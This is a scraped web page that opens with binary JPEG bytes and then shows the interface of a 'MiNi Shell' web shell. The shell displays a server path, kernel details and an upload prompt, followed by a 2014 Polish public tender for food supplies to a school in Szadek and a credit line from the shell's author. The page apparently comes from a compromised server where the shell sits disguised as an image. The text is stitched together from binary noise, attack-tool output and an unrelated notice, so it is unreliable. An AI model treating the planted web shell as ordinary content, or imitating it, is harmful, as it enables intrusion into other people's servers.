JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141208/401882-N-2014.html

<p class="kh_header"><b>Szadek: Postępowanie o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego o wartości powyżej 30 000 Euro, nie przekraczającej 207 000 Euro na dostawę artykułów żywnościowych dla Zespołu Publicznego Gimnazjum i Szkoły Podstawowej w Szadku</b><br>
<b>Numer ogłoszenia: 401882 - 2014; data zamieszczenia: 08.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Publicznego Gimnazjum i Szkoły Podstawowej w Szadku , ul. Prusinowska 4, 98-240 Szadek, woj. łódzkie, tel. 43 821 50 31, faks 43 821 50 31.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zespół Szkół i Placówek Oświatowych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego o wartości powyżej 30 000 Euro, nie przekraczającej 207 000 Euro na dostawę artykułów żywnościowych dla Zespołu Publicznego Gimnazjum i Szkoły Podstawowej w Szadku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest dostawa artykułów żywnościowych w roku 2015. Przedmiot zamówienia został podzielony na 10 pakietów.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenie zamówień uzupełniających na podstawie art. 67 ust.1 pkt. 7 Ustawy na poziomie 20 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.50.00.00-3, 15.40.00.00-2, 15.30.00.00-1, 15.20.00.00-0, 15.10.00.00-9, 15.81.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku zostanie dokonana na podstawie złożonego załącznika nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku zostanie dokonana na podstawie złożonego załącznika nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku zostanie dokonana na podstawie złożonego załącznika nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku zostanie dokonana na podstawie złożonego załącznika nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku zostanie dokonana na podstawie złożonego załącznika nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szadek.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Publicznego Gimnazjum i Szkoły Podstawowej w Szadku
ul. Prusinowska 4
98-240 Szadek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2014 godzina 10:00, miejsce: Zespół Publicznego Gimnazjum i Szkoły Podstawowej w Szadku
ul. Prusinowska 4
98-240 Szadek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1-Przetwory  sypkie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Artykuły spożywcze	Objętość produktu	Jednostka miary	Ilość szacunkowa
1.		Cukier  biały kryształ	1 kg	kg	1400
2.		Cukier puder	400 g	kg	30
3.		Proszek do pieczenia	30 g	szt	10 
4.		Cukier wanilinowy	32 g	szt	200 
5.		Drożdże piekarskie świeże	1kg	kg	2 
6.		Mąka pszenna wrocławska  typu  500	1 kg	kg	1000 
7.		Mąka ziemniaczana	1kg	kg	10 
8.		Ryż biały długi	1 kg	kg	75 
9.		Ryż w saszetkach biały długoziarnisty	400 g	szt	600 
10.		Kasza manna zwykła	1 kg	kg	50 
11.		Kasza jęczmienna średnia	1 kg	kg	500 
12.		Kasza gryczana	1 kg	kg	130 
13.		Sól spożywcza  jodowana drobna	1 kg	kg	300 
14.		Pieprz mielony	20 g	szt	250 
15.		Pieprz ziołowy	20 g	szt	500 
16.		Pieprz ziarno	20 g	szt	50 
17.		Papryka słodka mielona	20 g	szt	1000 
18.		Majeranek suszony	20 g	szt	300 
19.		Liść laurowy suszony	6 g	szt	70 
20.		Ziele angielskie suszone	15g 	szt	70 
21.		Kwasek cytrynowy spożywczy w proszku	20 g	szt	200 
22.		Przyprawa do kurczaka łagodna bez glutaminianu sodu	20 g 	szt	100 
23.		Przyprawa do zup i mięs  w proszku 	400g	szt	50
24.		Kostki rosołowe ( różne)	200 g	szt	50 
25.		Groszek konserwowy w puszce	400 g	szt	150 
26.		Kukurydza konserwowa w puszce	400 g	szt	70 
27.		Przyprawa w płynie do potraw 	1040g	szt	10 
28.		Sos sałatkowy w proszku	20 g	szt	200 
29.		Przyprawa do mięs bez konserwantów	200 g	szt	40 
30.		Sałatka szwedzka	3 l	szt	60 
31.		Pomidor b/s puszka	200g	szt	100
32.		Przyprawa grillowa łagodna	20 g	szt	100
33.		Oregano suszone	20 g	szt	50 
34.		Bazylia suszona	20 g	szt	50 
35.		Kminek suszony	20g	szt	50 
36.		Sos do spaghetti  w słoiku	520 g	szt	300 
37.		Sos boloński w słoiku	520 g	szt	200 
38.		Sos słodko- kwaśny w słoiku	520 g	szt	200 
39.		Sos grzybowy w proszku bez konserwantów	20 g	szt	60 
40.		Sos pomidorowy w proszku bez konserwantów	20 g	szt	60 
41.		Rodzynki gat.1 sułtanki	500 g 	szt	50 
42.		Koncentrat pomidorowy 30%	0.900 l 	szt	120 
43.		Ketchup łagodny, pikantny bez konserwantów 	0.5 l  	szt	60 
44.		Syrop  żurawinowy z zagęszczonego soku, bezglutenowy	430 ml	szt	400 
45.		Syrop  malinowy z zagęszczonego soku, bezglutenowy	430 ml	szt	200 
46.		Syrop truskawka z zagęszczonego soku, bezglutenowy	430 ml	szt	300 
47.		Syrop  czarna porzeczka z zagęszczonego soku, bezglutenowy	430 ml	szt	300 
48.		Bułka tarta pszenna jasna	0.5 kg	szt	600 
49.		Makaron świderki	500 g	szt	400 
50.		Makaron rosołowy nitka 5 jajeczny	250 g	szt	350 
51.		Makaron wstążka cięta 	500 g	szt	300 
52.		Makaron rurka 	500 g	szt	200 
53.		Makaron do spaghetti 	400 g	szt	500 
54.		Koncentrat buraczkowy  min.59 % 	330 ml	szt	60 
55.		Ocet jabłkowy 5%	300ml	szt	10
56.		Olej rzepakowy  	1l	szt	1000 
57.		Barszcz biały w płynie	1l	szt	200 
58.		Żurek papierek bez konserwantów	20 g	szt	300 
59.		Musztarda sarebska 	200 g	szt	50 
60.		Chrzan tarty słoik bez dodatków	200 g	szt	60 
61.		Majonez 	700 g	szt	100 
62.		Kisiel  z sokiem owocowym bez sztucznych barwników ( różne smaki)3/4 litra wody	58 g	szt	1200 
63.		Herbata  czarna w saszetkach	300 szt.	szt	15 
64.		Galaretka bez sztucznych barwników ( różne smaki)	75 g	szt	200 
65.		Dżem niskosłodzony z kawałkami owoców (różne smaki)	525g	szt	400 
66.		Masło orzechowo- czekoladowe 	630 g	szt	20 
67.		Wafelki paczkowane (różne smaki)  szt.	30g	szt	400 
68.		Herbatniki 	100 g	szt	200 
69.		Chrupki  kukurydziane do mleka czekoladowe	500 g	szt	60 
70.	Z	Zbożowe poduszeczki z nadzieniem różne smaki	500 g	szt	60
71.		Kawa naturalna,  mielona, Arabica	500 g	szt	30 
72.		Kakao naturalne tradycyjne	250 g	szt	10 
73.		Woda mineralna niegazowana	1,5l	Szt	60
74.		biszkopty	500g	szt	73.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Owoce i warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Artykuły spożywcze	Objętość produktu	Jednostka miary	Ilość szacunkowa
a.		Ziemniaki jadalne, nie pastewne,                                              	1kg	kg	16000 
2.		Marchew  	1kg	kg	1100 
3.		Pietruszka 	1kg	kg	200 
4.		Seler 	1kg	kg	200 
5.		Por  	1kg	kg	200
6.		Cebula biała	1kg	kg	150 
7.		Cebula czerwona 	1kg	kg	30 
8.		Kapusta biała 	1kg	kg	600 
9.		Kapusta czerwona 	1kg	kg	50 
10.		Kapusta pekińska 	1kg	kg	400 
11.		Kapusta kwaszona 	1kg	kg	1100 
12.		Kapusta włoska 	1kg	kg	60 
13.		Fasola średni Jaś 	1kg	kg	200 
14.		Burak ćwikłowy	1kg	kg	1000 
15.		Ogórek kwaszony 	1kg	kg	500 
16.		Ogórek konserwowy duża puszka 	12,25 l.	szt	25
17.		Ogórek konserwowy mała puszka 	4,2 l.	szt	25 
18.		Ogórek zielony 	1kg	kg	350 
19.		Pomidor 	1kg	kg	150 
20.		Papryka  	1kg	kg	60 
21.		Sałata główka	1	szt.	200 
22.		Sałata karbowana  główka	1	szt.	400 
23.		Kalafior główka	1	szt.	200 
24.		Jabłko lobo	1kg	kg	1000 
25.		Cytryna 	1kg	kg	400 
26.		Pieczarki  	1kg	kg	60 
27.		Szczypior ( pęczek)	1	szt.	100 
28.		Natka pietruszki ( pęczek)	1	szt.	300  
29.		Koperek (pęczek)	1	szt.	400
30.		Rzodkiewka  (pęczek)	1	szt.	70 
31.		Brokuł 	1kg	kg	150 
32.		Fasola szparagowa  zielona 	1kg	kg	150
33.		Czosnek świeży  główka polski	1	szt.	30 
34.		Banan 	1kg	kg	300 
35.		Mandarynka 	1kg	kg	100 
36.		Śliwka 	1kg	kg	15 
37.		Gruszka 	1kg	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Artykuły spożywcze	 Objętość produktu	Jednostka miary	Ilość szacunkowa
1.	Jaja świeże duże kl. L chowu ściółkowego	65-70 g	szt	16500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Artykuły spożywcze	 Objętość produktu	Jednostka miary	Ilość szacunkowa
1.		Chleb krojony pszenny 	500 g	szt	700 
2.		Bułka duża pszenna	100 g	szt	900
3.		Bułka mała pszenna	50g	szt	5000
4.		Chałka  drożdżowe pieczywo pszenne	400 g	szt	60 
5.		Angielka krojona 	400 g	szt	100
6.		Pączki  nadziewane marmoladą 	80g	szt	400
7.		Bułka drożdżowa 	130 g	szt	300
8.		Rogal pszenny	100 g	szt	600
9.		Placek drożdżowy	500g	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Artykuły spożywcze	Objętość produktu	Jednostka miary	Ilość szacunkowa
1.		Masło zawartość tłuszczu roślinnego 82%	250g	kg	30 
2.		Mleko folia 2% pasteryzowane	1l.	litry	200 
3.		Mleko  karton 3.2% UHT	1l.	szt	600 
4.		Śmietana 18% 	400 ml	litry	300 
5.		Jogurty naturalny	400 g	szt	700
6.		Jogurt owocowy ( różne smaki) zawierający kawałki owoców	125 g	szt	4500
7.		Twaróg półtłusty kl I	1kg	kg	120 
8.		Twarożek kanapkowo- sernikowy nie wymagający mielenia	1kg	kg	160 
9.		Ser żółty  tłusty  kl I(Gouda)	1kg	kg	7
10.		Margaryna zawartość tłuszczu roślinnego min.39 %	500 g	szt	300 
11.		Margaryna zawartość tłuszczu 60% witamina A i D3	500g	szt	50
12.		Jogurt waniliowy	125g	szt	400
13.		Jogurt czekoladowy	125g	szt	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Artykuły spożywcze	Objętość produktu	Jednostka miary	Ilość szacunkowa
1.		Kości wędzone 	1kg	kg	50 
2.		Schab b/k  	1kg	kg	720 
3.		Karczek b/k 	1kg	kg	980 
4.		Szynka surowa wieprzowa b/k 	1kg	kg	500 
5.		Wołowina b/k  	1kg	kg	100 
6.		Brzuch Świeży surowy b/ż 	1kg	kg	300 
7.		Boczek wędzony b/ ż 	1kg	kg	170 
8.		Kiełbasa Szynkowa kl I 80% mięsa wieprzowego	1kg	kg	300 
9.		Pachwina wędzona 	1kg	kg	200 
10.		Parówki cienkie drobiowe min.60% 	1kg	kg	130 
11.		Pasztet  drobiowy  min. 56% mięsa  (słoik) 	460 g	szt	30 
12.		Kiełbasa krakowska min. 68% mięsa	1 kg	kg	30
13.		Kiełbasa cienka Szynkówka min. 50 % mięsa	1kg	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Drób i przetwory drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Artykuły spożywcze	 Objętość produktu	Jednostka miary	Ilość szacunkowa
1.		Porcja rosołowa ze skrzydełkami 	1kg	kg	400 
2.		Pałka kurczaka 	1kg	kg	500 
3.		Udko 	1kg	kg	600 
4.		Filet z kurczaka 	1kg	kg	 1200
5.		Filet z indyka 	1kg	kg	400 
6.		Kiełbasa drobiowa  min.60% mięsa	1kg	kg	100 
7.		Pasztet drobiowy 56 % mięsa ( słoik) 	500g	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 8- Ryby
Lp.	Artykuły spożywcze	Objętość produktu	Jednostka miary	Ilość szacunkowa
1	Filet z miruny	1kg	kg	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Garmażeria.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Artykuły spożywcze	Objętość produktu	Jednostka miary	Ilość szacunkowa
1.		kopytka	1kg	kg	700
2.		śląskie	1kg	kg	700
3.		Pierogi z mięsem	1kg	kg	700
4.		pampuchy	50g	szt	12500
5.		Pierogi leniwe	1kg	kg	700
6.		Pierogi z kapustą i grzybami	1kg	kg	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Artykuły spożywcze	Objętość produktu	Jednostka miary	Ilość szacunkowa
1.		Bukiet warzyw	2.5kg	sz	200
2.		Truskawki	2.5 kg	kg	200
3.		wiśnia	2.5kg	kg	80
4.		brokuły	2.5kg	kg	300
5.		Marchewka mini	2.5 kg	kg	200
6.		Mieszanka wieloskładnikowa	2.5kg	kg	300
7.		Fasolka szparagowa	2.5 kg	kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com